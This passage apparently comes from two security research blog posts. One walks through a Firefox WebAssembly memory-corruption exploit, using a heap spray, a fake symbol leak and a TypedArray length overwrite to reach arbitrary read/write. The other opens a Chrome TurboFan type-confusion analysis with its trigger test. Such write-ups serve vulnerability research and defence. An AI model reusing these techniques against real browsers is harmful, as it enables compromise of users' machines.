The element address is computed by adding the index multiplied by 0x8 to the pointer stored in the array_ field. Each element of an external table takes 0x8 bytes in this 32-bit build: the code pointer read from [eax+ecx*8], followed by the tls pointer read from [eax+ecx*8+4].
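The address arithmetic can be sketched as below, including the inverse calculation of which index reaches a chosen address. This is an illustration under stated assumptions: the function names are hypothetical, and the array base used in the example is made up, since the real base depends on the heap layout at run time.

```javascript
const ELEMENT_SIZE = 0x8;           // element stride seen in the disassembly (ecx*8)
const ADDRESS_SPACE = 0x100000000;  // 32-bit address arithmetic wraps at 2^32

// Address read for a given index: base + index * 8, with 32-bit wrap-around.
function elementAddress(arrayBase, index) {
  return (arrayBase + index * ELEMENT_SIZE) % ADDRESS_SPACE;
}

// Index that makes the element address equal to `target`, or null if the
// distance from the base is not a multiple of the element size.
function indexForTarget(arrayBase, target) {
  const delta = (target - arrayBase + ADDRESS_SPACE) % ADDRESS_SPACE;
  if (delta % ELEMENT_SIZE !== 0) {
    return null;
  }
  return delta / ELEMENT_SIZE;
}

const exampleBase = 0x0a000000;   // made-up array base for illustration
const sprayAddress = 0x4d0f0000;  // heap spray address from the post
const exampleIndex = indexForTarget(exampleBase, sprayAddress);
console.log(exampleIndex.toString(16));
```

Because the multiplication wraps at 32 bits, addresses below the array base are reachable as well as addresses above it.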

Next is the call to the Code::lookupRange() method.

const CodeRange*
Code::lookupRange(void* pc) const
{
    CodeRange::PC target((uint8_t*)pc - segment_->base());
    size_t lowerBound = 0;
    size_t upperBound = metadata_->codeRanges.length();
    size_t match;
    if (!BinarySearch(metadata_->codeRanges, lowerBound, upperBound, target, &match))
        return nullptr;

    return &metadata_->codeRanges[match];
}

The Code object is located at address 0x4d0f000c in our heap spray and is constructed such that BinarySearch() will return true and match will be set to 1. The match is the index of the CodeRange structure in the metadata_->codeRanges vector. The size of the CodeRange object is 0x20 bytes and as such lookupRange() returns the CodeRange object which is located at address 0x4d0f0040 in our heap spray.

Next in WasmTableObject::getImpl() an object_ field pointing to the WasmInstanceObject object is requested, as shown below.

WasmInstanceObject*
Instance::object() const
{
    return object_;
}

A problem appears due to the way the garbage collector works and because some structures have been faked: they do not represent real JavaScript objects and have not gone through the real allocation mechanisms.

The Generational Garbage Collector (GGC), introduced in Mozilla Firefox version 32.0, has two heap types: nursery and tenured. The nursery heap is used for short-lived objects, and the tenured heap for long-lived objects.

When getting the WasmInstanceObject object, the JavaScript engine runtime requests details about the object state, namely whether it is in the nursery or in the tenured heap. Eventually the JSObject::readBarrier() method is called, as shown below.

/* static */ MOZ_ALWAYS_INLINE void
JSObject::readBarrier(JSObject* obj)
{
    if (obj && obj->isTenured())
        obj->asTenured().readBarrier(&obj->asTenured());
}

The method Cell::isTenured() checks whether the object is inside the tenured heap, as shown below.

MOZ_ALWAYS_INLINE bool isTenured() const { return !IsInsideNursery(this); }

The IsInsideNursery() function is shown below.

MOZ_ALWAYS_INLINE bool
IsInsideNursery(const js::gc::Cell* cell)
{
    if (!cell)
        return false;
    uintptr_t addr = uintptr_t(cell);
    addr &= ~js::gc::ChunkMask;
    addr |= js::gc::ChunkLocationOffset;
    auto location = *reinterpret_cast<ChunkLocation*>(addr);
    MOZ_ASSERT(location == ChunkLocation::Nursery || location == ChunkLocation::TenuredHeap);
    return location == ChunkLocation::Nursery;
}

Cell is the base class of all classes allocated by the GC. Chunks are the largest unit used by the allocator and are 1MB in size. The ChunkLocation enum denotes the type of the heap, as shown below.

enum class ChunkLocation : uint32_t
{
    Invalid = 0,
    Nursery = 1,
    TenuredHeap = 2
};

The IsInsideNursery() function converts an object address to the address of the location field of the associated chunk and checks whether the chunk belongs to the nursery or the tenured heap. If the object is in the tenured heap, additional operations are performed on it. This code path should be avoided as it would unnecessarily complicate the exploit. The ChunkLocation is within our heap spray, so we fake it by setting it to Nursery.
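The masking performed by IsInsideNursery() can be reproduced with a few lines of arithmetic. The 1MB chunk size comes from the text above; the value used for ChunkLocationOffset (0xffff0) is an assumption for a 32-bit build and is not given in this post. The read32 callback is a stand-in for real memory.

```javascript
const CHUNK_SIZE = 0x100000;       // chunks are 1MB, as stated above
const CHUNK_MASK = CHUNK_SIZE - 1;
// Assumption: offset of the ChunkLocation field inside a chunk on a 32-bit build.
const CHUNK_LOCATION_OFFSET = 0xffff0;

const ChunkLocation = { Invalid: 0, Nursery: 1, TenuredHeap: 2 };

// Address of the ChunkLocation field for the chunk that contains cellAddress.
function chunkLocationAddress(cellAddress) {
  // `>>> 0` keeps the result unsigned after the 32-bit bitwise operations.
  return ((cellAddress & ~CHUNK_MASK) | CHUNK_LOCATION_OFFSET) >>> 0;
}

// read32(address) is an assumed primitive returning the 32-bit value at address.
function isInsideNursery(cellAddress, read32) {
  if (cellAddress === 0) {
    return false;
  }
  return read32(chunkLocationAddress(cellAddress)) === ChunkLocation.Nursery;
}

// A fake object at 0x4d0f0000 is treated as a nursery object if the sprayed
// data at the computed location holds the value 1.
const fakeObject = 0x4d0f0000;
const locationAddress = chunkLocationAddress(fakeObject);
const sprayedRead32 = (address) =>
  address === locationAddress ? ChunkLocation.Nursery : 0;
console.log(locationAddress.toString(16), isInsideNursery(fakeObject, sprayedRead32));
```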

After that, the Instance::object() method successfully returns a new WasmInstanceObject object which is located at address 0x4d0f0000.

The next relevant call is to the WasmInstanceObject::getExportedFunction() method as it allows memory corruption at an arbitrary address. The method receives valid objects passed in as arguments and also receives the controllable funcIndex variable which we set to 0.

/* static */ bool
WasmInstanceObject::getExportedFunction(JSContext* cx, HandleWasmInstanceObject instanceObj,
                                        uint32_t funcIndex, MutableHandleFunction fun)
{
    if (ExportMap::Ptr p = instanceObj->exports().lookup(funcIndex)) {
        fun.set(p->value());
        return true;
    }

    const Instance& instance = instanceObj->instance();
    unsigned numArgs = instance.metadata().lookupFuncExport(funcIndex).sig().args().length();

    // asm.js needs to act like a normal JS function which means having the name
    // from the original source and being callable as a constructor.
    if (instance.isAsmJS()) {
        RootedAtom name(cx, instance.code().getFuncAtom(cx, funcIndex));
        if (!name)
            return false;

        fun.set(NewNativeConstructor(cx, WasmCall, numArgs, name, gc::AllocKind::FUNCTION_EXTENDED,
                                     SingletonObject, JSFunction::ASMJS_CTOR));
        if (!fun)
            return false;
    } else {
        RootedAtom name(cx, NumberToAtom(cx, funcIndex));
        if (!name)
            return false;

        fun.set(NewNativeFunction(cx, WasmCall, numArgs, name, gc::AllocKind::FUNCTION_EXTENDED));
        if (!fun)
            return false;
    }

    fun->setExtendedSlot(FunctionExtended::WASM_INSTANCE_SLOT, ObjectValue(*instanceObj));
    fun->setExtendedSlot(FunctionExtended::WASM_FUNC_INDEX_SLOT, Int32Value(funcIndex));

    if (!instanceObj->exports().putNew(funcIndex, fun)) {
        ReportOutOfMemory(cx);
        return false;
    }

    return true;
}

The instanceObj->exports() call returns a hash table. We fail the hash table lookup in order to reach the call to putNew(). Next, inside of the Metadata::lookupFuncExport() method, a second binary search is performed and it must return a result.

const FuncExport&
Metadata::lookupFuncExport(uint32_t funcIndex) const
{
    size_t match;
    if (!BinarySearch(ProjectFuncIndex(funcExports), 0, funcExports.length(), funcIndex, &match))
        MOZ_CRASH("missing function export");

    return funcExports[match];
}

The Metadata object is also fake and is located at address 0x4d0f0000. BinarySearch() calls BinarySearchIf() with arguments aContainer and aEnd under our control.

0:000> ln eip
win_build\\dist\\include\\mozilla\\binarysearch.h(80)+0xe
(035d1c00)   xul!mozilla::BinarySearchIf<ProjectFuncIndex,mozilla::detail::BinarySearchDefaultComparator<unsigned int> >+0x1e   |  (035d1c60)   xul!mozilla::BinarySearchIf<mozilla::Vector<js::wasm::Instance *,0,js::SystemAllocPolicy>,InstanceComparator>

0:000> dv
            aContainer = 0x012fe074
                aBegin = 0
                  aEnd = 2
              aCompare = 0x012fe078
aMatchOrInsertionPoint = 0x012fe070
                  high = 2
                   low = 0
                middle = <value unavailable>

0:000> dx -r1 (*((xul!ProjectFuncIndex *)0x12fe074))
(*((xul!ProjectFuncIndex *)0x12fe074))                 [Type: ProjectFuncIndex]
    [+0x000] funcExports      : 0x4d0f0030 [Type: mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy> &]

0:000> dx -r1 (*((xul!mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy> *)0x4d0f0030))
(*((xul!mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy> *)0x4d0f0030))                 [Type: mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy>]
    kElemIsPod       : false [Type: bool]
    kMaxInlineBytes  : 0x3f3 [Type: unsigned int]
    kInlineCapacity  : 0x0 [Type: unsigned int]
    [+0x000] mBegin           : 0x4d0effd4 [Type: js::wasm::FuncExport *]
    [+0x004] mLength          : 0x2 [Type: unsigned int]
    [+0x008] mTail            [Type: mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy>::CRAndStorage<0,0>]
    sMaxInlineStorage : 0x0 [Type: unsigned int]

Address 0x4d0f0040 contains 0, matching the funcIndex of 0, so that BinarySearchIf() returns true.

; File: xul.dll
; Version: 54.0.0.6368

.text:11D666D2 bool __cdecl mozilla::BinarySearchIf<struct ProjectFuncIndex, class mozilla::detail::BinarySearchDefaultComparator<unsigned int>>(struct ProjectFuncIndex const &, unsigned int, unsigned int, class mozilla::detail::BinarySearchDefaultComparator<unsigned int> const &, unsigned int *) proc near
.text:11D666D2
.text:11D666D2 arg_0           = dword ptr  8
.text:11D666D2 arg_4           = dword ptr  0Ch
.text:11D666D2 arg_8           = dword ptr  10h
.text:11D666D2
...
.text:11D666E5
.text:11D666E5 loc_11D666E5:
.text:11D666E5                 mov     ecx, [ebp+arg_4]
.text:11D666E8                 mov     edx, edi
.text:11D666EA                 sub     edx, esi
.text:11D666EC                 shr     edx, 1
.text:11D666EE                 add     edx, esi
.text:11D666F0                 imul    eax, edx, 3Ch   ; edx = 0x1
.text:11D666F3                 mov     eax, [eax+ebx+30h] ; mov eax,dword ptr [eax+ebx+30h] ds:002b:4d0f0040=00000000
.text:11D666F7                 mov     [ebp+arg_0], eax
.text:11D666FA                 lea     eax, [ebp+arg_0]
.text:11D666FD                 push    eax
.text:11D666FE                 call    mozilla::detail::BinarySearchDefaultComparator<uint>::operator()<uint>(uint const &)
.text:11D66703                 test    eax, eax        ; eax = 0x0, will return from the function
.text:11D66705                 jz      short loc_11D66720
...
.text:11D6671B loc_11D6671B:
.text:11D6671B                 pop     edi
.text:11D6671C                 pop     esi
.text:11D6671D                 pop     ebx
.text:11D6671E                 pop     ebp
.text:11D6671F                 retn
.text:11D66720 ; ---------------------------------------------------------------------------
.text:11D66720
.text:11D66720 loc_11D66720:
.text:11D66720                 mov     eax, [ebp+arg_8]
.text:11D66723                 mov     [eax], edx
.text:11D66725                 mov     al, 1
.text:11D66727                 jmp     short loc_11D6671B
.text:11D66727 bool __cdecl mozilla::BinarySearchIf<struct ProjectFuncIndex, class mozilla::detail::BinarySearchDefaultComparator<unsigned int>>(struct ProjectFuncIndex const &, unsigned int, unsigned int, class mozilla::detail::BinarySearchDefaultComparator<unsigned int> const &, unsigned int *) endp
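The control flow in the listing above can be modeled roughly as follows. This is a simplified sketch rather than the Mozilla source: the function name, the result object and the sample array are illustrative, and the comparator assumes the searched-for function index is 0, so that the zero dword read at the midpoint yields a comparison result of 0.

```javascript
// Simplified model of the loop in the disassembly. `compare` plays the role of
// BinarySearchDefaultComparator: 0 means match, a negative value means "search
// the lower half", a positive value means "search the upper half".
function binarySearchIf(container, begin, end, compare) {
  let low = begin;
  let high = end;
  while (low < high) {
    const middle = low + ((high - low) >>> 1); // sub edx, esi / shr edx, 1 / add edx, esi
    const result = compare(container[middle]);
    if (result === 0) {
      return { found: true, index: middle };   // mov [eax], edx / mov al, 1
    }
    if (result < 0) {
      high = middle;
    } else {
      low = middle + 1;
    }
  }
  return { found: false, index: low };
}

// Assumed target of 0; the array stands in for attacker-controlled memory and
// only needs to hold a matching value at the first midpoint.
const target = 0;
const comparator = (value) => (target === value ? 0 : target < value ? -1 : 1);
const hit = binarySearchIf([7, 0, 9], 0, 3, comparator);
console.log(hit);
```

With three entries the first midpoint is index 1, which corresponds to the edx = 0x1 annotation in the listing.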

This brings us to the call to putNew() which will try to put the key funcIndex and the value fun into the hash table.

    template <typename... Args>
    MOZ_MUST_USE bool putNew(const Lookup& l, Args&&... args)
    {
        if (!this->checkSimulatedOOM())
            return false;

        if (!EnsureHash<HashPolicy>(l))
            return false;

        if (checkOverloaded() == RehashFailed)
            return false;

        putNewInfallible(l, mozilla::Forward<Args>(args)...);
        return true;
    }

The HashTable::putNew() method wraps a call to HashTable::putNewInfallible(), shown below.

    template <typename... Args>
    void putNewInfallible(const Lookup& l, Args&&... args)
    {
        MOZ_ASSERT(!lookup(l).found());
        mozilla::ReentrancyGuard g(*this);
        putNewInfallibleInternal(l, mozilla::Forward<Args>(args)...);
    }

This in turn wraps another call to HashTable::putNewInfallibleInternal(), shown below.

    template <typename... Args>
    void putNewInfallibleInternal(const Lookup& l, Args&&... args)
    {
        MOZ_ASSERT(table);

        HashNumber keyHash = prepareHash(l);
        Entry* entry = &findFreeEntry(keyHash);
...
    }

The HashTable::prepareHash() method calculates the hash for the given key and in our case will return 0xfffffffe. This will cause findFreeEntry() to corrupt the JSValueTag at 0x4d0f0064, changing it from JSVAL_TAG_STRING (0xffffff86) to JSVAL_TAG_SYMBOL (0xffffff87), as shown below.

; File: xul.dll
; Version: 54.0.0.6368

.text:10BE112F private: class js::detail::HashTableEntry<class js::HashMapEntry<unsigned int, class js::jit::MDefinition *>> & __thiscall js::detail::HashTable<class js::HashMapEntry<unsigned int, class js::jit::MDefinition *>, struct js::HashMap<unsigned int, class js::jit::MDefinition *, struct js::DefaultHasher<unsigned int>, class js::SystemAllocPolicy>::MapHashPolicy, class js::SystemAllocPolicy>::findFreeEntry(unsigned int) proc near
.text:10BE112F
.text:10BE112F var_4           = dword ptr -4
.text:10BE112F arg_0           = dword ptr  8
.text:10BE112F
.text:10BE112F                 push    ebp
.text:10BE1130                 mov     ebp, esp
.text:10BE1132                 push    ecx
.text:10BE1133                 push    ebx
.text:10BE1134                 push    esi
.text:10BE1135                 mov     ebx, ecx
.text:10BE1137                 push    edi
.text:10BE1138                 mov     edi, [ebp+arg_0]
.text:10BE113B                 mov     esi, edi
.text:10BE113D                 movzx   ecx, byte ptr [ebx+7] ; movzx ecx,byte ptr [ebx+7]       ds:002b:4d0f00b7=7e
.text:10BE1141                 shr     esi, cl         ; 0xfffffffe >>> 0x7e, esi becomes 0x3 (in inlined hash1() call)
.text:10BE1143                 mov     edx, esi
.text:10BE1145                 mov     [ebp+var_4], ecx
.text:10BE1148                 shl     edx, 4
.text:10BE114B                 add     edx, [ebx+8]    ; add edx,dword ptr [ebx+8] ds:002b:4d0f00b8=4d0f0034 (edx = 0x30)
.text:10BE114E                 cmp     dword ptr [edx], 1 ; cmp dword ptr [edx],1    ds:002b:4d0f0064=ffffff86 (inlined entry->isLive())
.text:10BE1151                 jbe     short loc_10BE1180
.text:10BE1153                 push    20h ; start of inlined hash2() call
.text:10BE1155                 pop     eax
.text:10BE1156                 sub     eax, ecx
.text:10BE1158                 mov     ecx, eax
.text:10BE115A                 shl     edi, cl
.text:10BE115C                 mov     ecx, [ebp+var_4]
.text:10BE115F                 shr     edi, cl
.text:10BE1161                 mov     ecx, eax
.text:10BE1163                 xor     eax, eax
.text:10BE1165                 or      edi, 1
.text:10BE1168                 inc     eax
.text:10BE1169                 shl     eax, cl
.text:10BE116B                 dec     eax ; end of inlined hash2() call
.text:10BE116C
.text:10BE116C loc_10BE116C:
.text:10BE116C                 or      dword ptr [edx], 1 ; or dword ptr [edx],1    ds:002b:4d0f0064=ffffff86 (inlined entry->setCollision() call)
.text:10BE116F                 sub     esi, edi
.text:10BE1171                 and     esi, eax
.text:10BE1173                 mov     edx, esi
.text:10BE1175                 shl     edx, 4
.text:10BE1178                 add     edx, [ebx+8]
.text:10BE117B                 cmp     dword ptr [edx], 1 ; (inlined entry->isLive())
.text:10BE117E                 ja      short loc_10BE116C ;
.text:10BE1180
.text:10BE1180 loc_10BE1180:
.text:10BE1180                 pop     edi
.text:10BE1181                 pop     esi
.text:10BE1182                 mov     eax, edx
.text:10BE1184                 pop     ebx
.text:10BE1185                 mov     esp, ebp
.text:10BE1187                 pop     ebp
.text:10BE1188                 retn    4
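The arithmetic annotated in the listing can be replayed in a few lines. The constants are the ones shown in the debugger comments above; the variable names are illustrative. Only the first probe and the collision bit are modeled here, not the rest of the probing loop.

```javascript
const keyHash = 0xfffffffe;  // value returned by prepareHash()
const hashShift = 0x7e;      // byte read from [ebx+7]
const table = 0x4d0f0034;    // dword read from [ebx+8]
const entrySize = 0x10;      // shl edx, 4

// x86 `shr r32, cl` only uses the low 5 bits of cl. JavaScript's >>> masks the
// shift count the same way, so a shift by 0x7e behaves like a shift by 0x1e.
const h1 = keyHash >>> hashShift;
const entryAddress = table + h1 * entrySize;

// The inlined setCollision() is `or dword ptr [edx], 1` on the entry's first dword.
const tagBefore = 0xffffff86;            // JSVAL_TAG_STRING
const tagAfter = (tagBefore | 1) >>> 0;  // JSVAL_TAG_SYMBOL

console.log(h1, entryAddress.toString(16), tagAfter.toString(16));
```

This reproduces the values in the listing: a first probe index of 3, an entry address of 0x4d0f0064, and a tag that changes from 0xffffff86 to 0xffffff87.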

Fake Symbol

The heap spray contains a JSString at address 0x4d0f0060, as shown below.

0:000> dd 4d0f0060
4d0f0060  13cd01a0 ffffff86 00000000 00000000
4d0f0070  00000000 00000000 00000000 00000000
4d0f0080  0000007b 00000030 4d0f0080 cccccccc
4d0f0090  00000000 00000000 16712200 ffffff8c
4d0f00a0  00000000 00000000 09eb3360 ffffff8c

After corrupting the JSValueTag, the string becomes a fake JS::Symbol object. By calling toString() on the fake symbol, 0x30 bytes from address 0x4d0f0080 are leaked. This includes the address of a TypedArray object at 0x4d0f0098 and the address of an iframe at 0x4d0f00a8 to be used later.

Arbitrary Memory Read/Write

Once the address of the TypedArray object has been leaked, the corrupted part of the heap spray is restored to its original contents and the write address is updated to point to the unaligned address of the length field of the TypedArray object. The vulnerability is then triggered a second time. Below are the contents of the TypedArray object before the second write.

0:000> dd 14642200
14642200  143f4cb8 1463fa18 00000000 04bf7198
14642210  00000000 ffffff83 00000010 ffffff81
14642220  00000000 ffffff81 14642230 00000000
14642230  00000000 00000000 00000000 00000000
14642240  00000000 00000000 00000000 00000000
14642250  00000000 00000000 00010000 00000000
14642260  00000000 00000000 00000000 00000000
14642270  143f4cb8 1463fa18 00000000 04bf7198

The TypedArray length is located at address 0x14642218, the data buffer starts at 0x14642230, and the next TypedArray is located at address 0x14642270. Below are the contents after the write changes the length from 0x10 to 0x10010.

0:000> dd 14642200
14642200  143f4cb8 1463fa18 00000000 04bf7198
14642210  00000000 ffffff83 00010010 ffffff81
14642220  00000000 ffffff81 14642230 00000000
14642230  00000000 00000000 00000000 00000000
14642240  00000000 00000000 00000000 00000000
14642250  00000000 00000000 00010000 00000000
14642260  00000000 00000000 00000000 00000000
14642270  143f4cb8 1463fa18 00000000 04bf7198
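The effect of an unaligned write on the length field can be simulated with a DataView. This is a sketch under two assumptions that the text does not state explicitly: that the write is the same `or dword ptr [edx], 1` seen in findFreeEntry(), and that it is aimed two bytes into the length field. The helper name and buffer layout are illustrative.

```javascript
// Model the 8 bytes at 0x14642218: the 32-bit length followed by its tag.
const heap = new DataView(new ArrayBuffer(0x20));
const LENGTH_OFFSET = 0x18;
heap.setUint32(LENGTH_OFFSET, 0x00000010, true);      // length = 0x10
heap.setUint32(LENGTH_OFFSET + 4, 0xffffff81, true);  // tag dword that follows it

// Little-endian equivalent of `or dword ptr [addr], mask`.
function orDword(view, offset, mask) {
  const value = (view.getUint32(offset, true) | mask) >>> 0;
  view.setUint32(offset, value, true);
}

// Assumed write address: length field + 2, so bit 0 lands in the third byte.
orDword(heap, LENGTH_OFFSET + 2, 1);

const newLength = heap.getUint32(LENGTH_OFFSET, true);
const tagAfterWrite = heap.getUint32(LENGTH_OFFSET + 4, true);
console.log(newLength.toString(16), tagAfterWrite.toString(16));
```

Under these assumptions the length becomes 0x10010 while the following tag dword is unchanged, which matches the two dumps above.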

The corrupted TypedArray is then used to overwrite the length of the adjacent TypedArray with 0xffffffff. This way arbitrary memory read/write is achieved.

Animation showing the vulnerability being exploited.

In the next post in this series we will use the ability to read and write arbitrary memory to achieve code execution.

The post Firefox Vulnerability Research appeared first on Exodus Intelligence.

A EULOGY FOR PATCH-GAPPING CHROME

24 February 2020 at 14:01

Authors: István Kurucsai and Vignesh S Rao

In 2019 we looked at patch gapping Chrome on two separate occasions. The conclusion was that exploiting 1day vulnerabilities well before the fixes were distributed through the stable channel is feasible and allows potential attackers to have 0day-like capabilities with only known vulnerabilities. This was the result of a combination of factors:

  • the 6-week release-cycle of Chrome that only included occasional releases in-between
  • the open-source development model that makes security fixes public before they are released to end-users
  • this is compounded by the fact that regression tests are often included with patches, reducing exploit development time significantly. It is often the case that achieving the initial corruption is the hardest part of a browser/JS engine exploit as the rest can be relatively easily reused

Mozilla seems to tackle the issue by withholding security-critical fixes from public source repositories right up to the point of a release and not including regression tests with them. Google went with an aggressive release schedule, first moving to a biweekly cycle for stable, then pushing it even further with what appears to be weekly releases in February.

This post tries to examine if leveraging 1day vulnerabilities in Chrome is still practical by analyzing and exploiting a vulnerability in TurboFan. Some details of v8 that were already discussed in our previous posts will be glossed over, so we would recommend reading them as a refresher.

The vulnerability

We will be looking at Chromium issue 1053604 (restricted for the time being), fixed on the 19th of February. It has all the characteristics of a promising 1day candidate: a simple but powerful-looking regression test, incorrect modeling of side-effects, and an easy-to-understand one-line change. The CL with the patch can be found here; the abbreviated code of the affected function is shown below.

NodeProperties::InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(
  JSHeapBroker* broker, Node* receiver, Node* effect,
  ZoneHandleSet<Map>* maps_return) {
    ...
    InferReceiverMapsResult result = kReliableReceiverMaps;
    while (true) {
      switch (effect->opcode()) {
      ...
        case IrOpcode::kCheckMaps: {
          Node* const object = GetValueInput(effect, 0);
          if (IsSame(receiver, object)) {
            *maps_return = CheckMapsParametersOf(effect->op()).maps();
            return result;
          }
          break;
        }
        case IrOpcode::kJSCreate: {
          if (IsSame(receiver, effect)) {
            base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);
            if (initial_map.has_value()) {
              *maps_return = ZoneHandleSet<Map>(initial_map->object());
              return result;
            }
            // We reached the allocation of the {receiver}.
            return kNoReceiverMaps;
          }
+         result = kUnreliableReceiverMaps;  // JSCreate can have side-effect.
          break;
        }
      ...  
      }
      // Stop walking the effect chain once we hit the definition of
      // the {receiver} along the {effect}s.
      if (IsSame(receiver, effect)) return kNoReceiverMaps;
      
      // Continue with the next {effect}.
      effect = NodeProperties::GetEffectInput(effect);
    }
}

The changed function, NodeProperties::InferReceiverMapsUnsafe, is called through the MapInference::MapInference constructor. It walks the effect chain of the compiled function backward from the use of an object as a receiver for a function call and finds the set of possible maps that the object can have. For example, when encountering a CheckMaps node on the effect chain, the compiler can be sure that the map of the object can only be what the CheckMaps node looks for. In the case of the JSCreate node indicated in the vulnerability, if it creates the receiver whose maps the compiler is trying to infer, the initial map of the created object is returned. However, if the JSCreate is for a different object than the receiver, it is assumed that it cannot change the map of the receiver. The vulnerability results from this oversight, as JSCreate accesses the prototype of the new target, which can be intercepted by a Proxy. This can cause arbitrary user JS code to execute.

In the patched version, if a JSCreate is encountered on the effect chain, the inference result is marked as unreliable. The compiler can still optimize based on the inferred maps but has to guard for them explicitly, fixing the issue.
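The difference between the two versions can be illustrated with a toy model of the effect chain walk. This is only a sketch: the node objects, the string results and the `patched` flag are hypothetical stand-ins, and the GetJSCreateMap branch of the real function is left out.

```javascript
// Toy model of the backward walk in InferReceiverMapsUnsafe. Each node is a
// plain object; `effectInput` points to the previous node on the effect chain.
function inferReceiverMaps(receiver, effect, patched) {
  let result = "reliable";
  while (effect) {
    if (effect.opcode === "CheckMaps" && effect.object === receiver) {
      return { result, maps: effect.maps };
    }
    if (effect.opcode === "JSCreate" && effect !== receiver && patched) {
      result = "unreliable"; // models the one-line fix: JSCreate can have side effects
    }
    if (effect === receiver) break; // reached the definition of the receiver
    effect = effect.effectInput;
  }
  return { result: "none", maps: [] };
}

// Chain (walked backward): JSCreate for another object, then CheckMaps on the receiver.
const receiver = { opcode: "Parameter" };
const checkMaps = { opcode: "CheckMaps", object: receiver, maps: ["smi-array-map"], effectInput: null };
const jsCreate = { opcode: "JSCreate", effectInput: checkMaps };

const vulnerableResult = inferReceiverMaps(receiver, jsCreate, false);
const patchedResult = inferReceiverMaps(receiver, jsCreate, true);
console.log(vulnerableResult.result, patchedResult.result);
```

In this model both versions infer the same maps, but only the patched walk reports them as unreliable, which is what forces the caller to guard them with explicit checks.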

The MapInference class is used mainly by the JSCallReducer optimizer of TurboFan, which attempts to special-case or inline some function calls based on the inferred maps of their receiver objects. The regression test included with the patch is shown below.

let a = [0, 1, 2, 3, 4];
function empty() {}
function f(p) {
  a.pop(Reflect.construct(empty, arguments, p));
}
let p = new Proxy(Object, {
  get: () => (a[0] = 1.1, Object.prototype)
});
function main(p) {
  f(p);
}
%PrepareFunctionForOptimization(empty);
%PrepareFunctionForOptimization(f);
%PrepareFunctionForOptimization(main);
main(empty);
main(empty);
%OptimizeFunctionOnNextCall(main);
main(p);

The issue is triggered in function f, through Array.prototype.pop. The Reflect.construct call is turned into a JSCreate operation, which will run user JS code if a Proxy is passed in that intercepts the prototype get access. While the pop function does not take an argument, providing the return value of Reflect.construct as one ensures that there is an effect edge between the resulting JSCreate and JSCall nodes so that the vulnerability can be triggered.
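The side effect itself can be observed without any v8-specific flags. The sketch below passes a Proxy as the new target to Reflect.construct and records which property keys are read; the names `accessed` and `newTarget` are illustrative.

```javascript
const accessed = [];
function empty() {}

// A Proxy around Object that logs every property read before forwarding it.
const newTarget = new Proxy(Object, {
  get(target, key, receiver) {
    accessed.push(key); // arbitrary user code could run here
    return Reflect.get(target, key, receiver);
  },
});

// Constructing with the Proxy as new.target makes the engine look up its
// "prototype" property in order to set the prototype of the new object.
const created = Reflect.construct(empty, [], newTarget);
console.log(accessed);
```

The get trap fires for the "prototype" key during object creation, which is the point at which the regression test modifies the array.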

The function implementing reduction of calls to Array.prototype.pop is JSCallReducer::ReduceArrayPrototypePop. Its code is shown below.

Reduction JSCallReducer::ReduceArrayPrototypePop(Node* node) {
  ...
  Node* receiver = NodeProperties::GetValueInput(node, 1);
  Node* effect = NodeProperties::GetEffectInput(node);
  Node* control = NodeProperties::GetControlInput(node);
  MapInference inference(broker(), receiver, effect);
  if (!inference.HaveMaps()) return NoChange();
  MapHandles const& receiver_maps = inference.GetMaps();
  std::vector<ElementsKind> kinds;
  if (!CanInlineArrayResizingBuiltin(broker(), receiver_maps, &kinds))  {
    return inference.NoChange();
  }
  if (!dependencies()->DependOnNoElementsProtector()) UNREACHABLE();
  inference.RelyOnMapsPreferStability(dependencies(), jsgraph(), &effect, control, p.feedback());
  std::vector<Node*> controls_to_merge;
  std::vector<Node*> effects_to_merge;
  std::vector<Node*> values_to_merge;
  Node* value = jsgraph()->UndefinedConstant();
  Node* receiver_elements_kind = LoadReceiverElementsKind(receiver, &effect, &control);
  Node* next_control = control;
  Node* next_effect = effect;
  for (size_t i = 0; i < kinds.size(); i++) {      
  // inline pop for every inferred receiver map element kind and dispatch as appropriate
  ...
  }

If the receiver maps of the call can be inferred, the reducer replaces the JSCall to the runtime Array.prototype.pop with an implementation specialized to the element kinds of the inferred maps. Constructing the MapInference object invokes NodeProperties::InferReceiverMapsUnsafe, which infers the map(s) and, in the vulnerable version, returns kReliableReceiverMaps. Based on this return value, RelyOnMapsPreferStability won’t insert map checks or code dependencies. This changes in the patched version, as encountering a JSCreate during the effect chain walk will change the return value to kUnreliableReceiverMaps, which makes RelyOnMapsPreferStability insert the needed checks.

So what happens in the regression test? The array a is defined with PACKED_SMI_ELEMENTS element kind. When the f function is optimized on the third invocation of main, Reflect.construct is turned into a JSCreate node and a.pop into a JSCall, with an effect edge between the two. Then the JSCall is reduced based on the inferred map information, which is incorrectly marked as reliable, so no map check will be done after the Reflect.construct call. When invoked with the Proxy argument, the user JS code changes the element kind of a to PACKED_DOUBLE_ELEMENTS, then the inlined pop operates on it as if it was still a packed SMI array, leading to a type confusion.

There are many callsites of the MapInference constructor but those that look the most immediately useful are the JSCallReducers for the pop, push and shift array functions.

Exploitation

To exploit the vulnerability, it is first necessary to understand pointer compression, a recent improvement to v8. It is a scheme on 64-bit architectures that saves memory by using 32-bit pointers into a compressed heap that is 4GB in size and 4GB-aligned. According to measurements by the developers, this saves 30-40% on the memory usage of v8. From an exploitation perspective, this has several implications:

  • on 64-bit platforms, SMIs and tagged pointers are now 32-bit in size, while doubles in unboxed arrays storage remain 64-bit
  • it adds the additional step of achieving arbitrary read/write within the compressed heap to an exploit
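The relationship between full and compressed pointers can be sketched with BigInt arithmetic. This is a simplified model of the scheme as described above, not v8's actual implementation; the heap base and the sample address are made up for illustration.

```javascript
const HEAP_SIZE = 1n << 32n; // the compressed heap spans 4GB

// A compressed pointer is the 32-bit offset of an address within the heap.
function compress(fullAddress) {
  return fullAddress & (HEAP_SIZE - 1n);
}

// Decompression adds the offset back onto the 4GB-aligned heap base.
function decompress(heapBase, compressed) {
  if (heapBase % HEAP_SIZE !== 0n) {
    throw new RangeError("heap base must be 4GB-aligned");
  }
  return heapBase + compressed;
}

const heapBase = 0x1234n << 32n;           // hypothetical heap base
const fullPointer = heapBase + 0x0804a2c1n; // hypothetical tagged pointer
const compressedPointer = compress(fullPointer);
console.log(compressedPointer.toString(16), decompress(heapBase, compressedPointer).toString(16));
```

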